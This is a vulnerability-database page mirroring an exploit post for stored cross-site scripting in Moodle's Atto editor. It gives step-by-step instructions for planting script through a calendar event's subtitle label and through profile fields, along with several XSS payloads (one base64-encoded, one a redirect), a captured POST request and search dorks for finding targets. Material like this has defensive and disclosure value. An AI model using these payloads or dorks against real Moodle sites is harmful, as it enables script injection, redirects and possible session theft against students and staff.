Vulners
Lucene search
Moodle Atto Editor Cross Site Scripting
🗓️ 26 Mar 2021 00:00:00Reported by Vincent666 ibn WinnieType 
packetstorm🔗 packetstormsecurity.com👁 455 Views
`# Exploit Title: Moodle Atto Editor Cross Site Scripting
# Date: 26.03.2021
# Author: Vincent666 ibn Winnie
# Software Link: https://moodle.org/plugins/editor_atto
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Google Dorks: inurl:/lib/editor/atto/plugins/managefiles/ or
calendar/view.php?view=month
# My Youtube Channel: https://www.youtube.com/channel/UCZOWpC2dW9sipPq5z63C2rQ
PoC:
Video PoC: (Update)
https://www.youtube.com/watch?v=vnyo48KImvg
https://www.youtube.com/watch?v=fUWGRqT7lDU
Stored XSS in Atto Editor (default editor)
Use Demo:
https://school.moodledemo.net/
Choose a role : Student (example)
Open calendar :
https://school.moodledemo.net/calendar/view.php?view=month
Create new event:
Example:
Event Title "Test"
Description :Choose Insert Video File and choose Video:
Video Source Url you can paste video link from youtube
And open Subtitles and Captions:
Subtitle track URL use video link from youtube
Field Label : There is we can use xss code:
<img src="1" onerror="alert(1)" />
or try in base64
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+"
type="image/svg+xml" AllowScriptAccess="always"></embed>
Insert Media and save this.
Open event and get stored xss.
Or we can use Profile:
https://sandbox.moodledemo.net/user/edit.php?id=4&returnto=profile
Field Label in the Editor vulnerable to XSS.
We can use XSS and js redirect in the profile:
"><video src/onerror=alert(1)><img src=x
onerror=window.open('https://www.google.com/');>
POST:
https://school.moodledemo.net/lib/ajax/service.php?sesskey=vCHlHS7oIl&info=core_calendar_submit_create_update_form
Host: school.moodledemo.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 996
Origin: https://school.moodledemo.net
Connection: keep-alive
Referer: https://school.moodledemo.net/calendar/view.php?view=month
Cookie: MoodleSession=4ea0036558425526decc096ed375b886;
EU_COOKIE_LAW_CONSENT=true
[{"index":0,"methodname":"core_calendar_submit_create_update_form","args":{"formdata":"id=0&userid=56&modulename=&instance=0&visible=1&eventtype=user&sesskey=vCHlHS7oIl&_qf__core_calendar_local_event_forms_create=1&mform_showmore_id_general=1&name=test×tart%5Bday%5D=25×tart%5Bmonth%5D=3×tart%5Byear%5D=2021×tart%5Bhour%5D=10×tart%5Bminute%5D=4&description%5Btext%5D=%3Cp%20dir%3D%22ltr%22%20style%3D%22text-align%3A%20left%3B%22%3E%26nbsp%3B%3Cvideo%20controls%3D%22true%22%3E%3Csource%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%22%3E%3Ctrack%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%22%20kind%3D%22subtitles%22%20srclang%3D%22en%22%20label%3D%22%3Cimg%20src%3D%26quot%3B1%26quot%3B%20onerror%3D%26quot%3Balert(1)%26quot%3B%20%2F%3E%22%3Ehttps%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%3C%2Fvideo%3E%26nbsp%3B%3Cbr%3E%3C%2Fp%3E&description%5Bformat%5D=1&description%5Bitemid%5D=495874277&location=&duration=0"}}]
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Mar 2021 00:00Current
7.4High risk
Vulners AI Score7.4